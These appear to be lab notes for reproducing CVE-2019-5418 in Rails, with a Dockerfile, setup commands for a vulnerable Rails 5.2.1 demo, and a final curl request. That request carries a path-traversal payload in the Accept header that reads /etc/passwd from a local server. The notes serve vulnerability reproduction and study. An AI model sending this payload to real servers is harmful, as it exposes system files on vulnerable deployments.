Build Docker container:
Dockerfile
FROM ruby:2.5
RUN apt-get update -qq && apt-get install -y nodejs postgresql-client
RUN mkdir /myapp
WORKDIR /myapp
COPY Gemfile /myapp/Gemfile
COPY Gemfile.lock /myapp/Gemfile.lock
RUN bundle install
COPY . /myapp
# Add a script to be executed every time the container starts.
COPY entrypoint.sh /usr/bin/
RUN chmod +x /usr/bin/entrypoint.sh
ENTRYPOINT ["entrypoint.sh"]
EXPOSE 3000
# Start the main process.
CMD ["rails", "server", "-b", "0.0.0.0"]Setup docker container
docker build -t rails:CVE-2019-5418 .
docker run -ti --rm -v `pwd`:/myapp -p 3000:3000 rails:CVE-2019-5418 /bin/bash
git clone https://github.com/mpgn/CVE-2019-5418.git
cd CVE-2019-5418/demo/
sed -i -e "s/^gem 'rails'.*/gem 'rails', '5.2.1'/" -e "s/^ruby '2.5.1'$/ruby '2.5.5'/" Gemfile
bundle install
bundle update
bundle exec rails s -p 3000 -b '0.0.0.0'To demonstrate vulnerability
curl -i -s -k -X $'GET' \
-H $'Host: 127.0.0.1:3000' -H $'Accept-Encoding: gzip, deflate' -H $'Accept: .././.././.././.././.././.././.././.././.././.././e*c/./p*d{{' -H $'Accept-Language: en' -H $'User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)' -H $'Connection: close' \
$'http://127.0.0.1:3000/chybeta'